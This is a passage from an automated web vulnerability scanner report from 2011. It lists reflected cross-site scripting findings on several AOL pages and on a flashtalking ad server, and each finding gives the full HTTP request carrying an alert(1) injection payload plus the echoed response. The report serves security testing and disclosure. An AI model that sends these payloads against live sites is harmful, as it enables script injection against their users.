Path:   /blog/2011/02/04/worst-foreclosed-home-vandalism-ever/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5777"a%3d"b"0794e1ec659 was submitted in the REST URL parameter 4. This input was echoed as f5777"a="b"0794e1ec659 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/2011/02/04f5777"a%3d"b"0794e1ec659/worst-foreclosed-home-vandalism-ever/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:12:01 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:12:02 GMT; path=/
Keep-Alive: timeout=5, max=999900
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array
(

...[SNIP]...
<input type="hidden" name="referer" value="http://realestate.aol.com:1080/blog/2011/02/04f5777"a="b"0794e1ec659/worst-foreclosed-home-vandalism-ever/">
...[SNIP]...

1.189. http://servedby.flashtalking.com/imp/3/14886 [97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbd12"-alert(1)-"111d3ab201f was submitted in the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93306318;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=11328D1137525B"

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:32 GMT
Server: Jetty(6.1.22)
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 811
Via: 1.1 mdw061007 (MII-APC/1.6)


var ftGUID_97125="11328D1137525B";
var ftConfID_97125="0";
var ftParams_97125="click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e1
...[SNIP]...
50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641";
var ftKeyword_97125="";
var ftSegment_97125="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97125/167578/js/j-97125-1
...[SNIP]...

1.190. http://servedby.flashtalking.com/imp/3/14886 [97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 669f0"-alert(1)-"5792a5b5c84 was submitted in the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11326E86B479C3";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061005 (MII-APC/1.6)


var ftGUID_97126="11326E86B479C3";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-1
...[SNIP]...

1.191. http://servedby.flashtalking.com/imp/3/14886 [cachebuster parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92b2b"-alert(1)-"f12dac9a158 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327B18B63DDD";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061006 (MII-APC/1.6)


var ftGUID_97126="11327B18B63DDD";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m97126" name="ftscript_m97126">
...[SNIP]...

1.192. http://servedby.flashtalking.com/imp/3/14886 [ftadz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af2"-alert(1)-"04fe214699f was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:51 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=113270ECF2D3D1";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:51 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061004 (MII-APC/1.6)


var ftGUID_97126="113270ECF2D3D1";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="fts
...[SNIP]...

1.193. http://servedby.flashtalking.com/imp/3/14886 [ftscw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877e4"-alert(1)-"462c4afd1b1 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:04 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11323EB1B09D0E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:04 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_97126="11323EB1B09D0E";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m
...[SNIP]...

1.194. http://servedby.flashtalking.com/imp/3/14886 [ftx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b507"-alert(1)-"1359c52bda6 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:25 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327F503D579E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:25 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_97126="11327F503D579E";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568
...[SNIP]...

1.195. http://servedby.flashtalking.com/imp/3/14886 [fty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b515f"-alert(1)-"d141519c932 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:38 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11328D1137525B";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:38 GMT
Content-Length: 758
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_97126="11328D1137525B";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js"
...[SNIP]...

1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9548d"-alert(1)-"1c425036cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:29 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1132056B5C07B9";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:29 GMT
Cache-Control: no-cache, no-store
Content-Length: 761
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_97126="1132056B5C07B9";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
3575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m97126" name="ftscript_m97126
...[SNIP]...

1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998a2"><script>alert(1)</script>9cd08062e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?998a2"><script>alert(1)</script>9cd08062e59=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:00 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 63616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/?998a2"><script>alert(1)</script>9cd08062e59=1"/>
...[SNIP]...

1.198. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e was submitted in the REST URL parameter 3. This input was echoed as c7d53"><img src=a onerror=alert(1)>d069487f7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2011/02/01c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:12 GMT; path=/
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/01c7d53"><img src=a onerror=alert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/">
...[SNIP]...

1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/

Issue detail

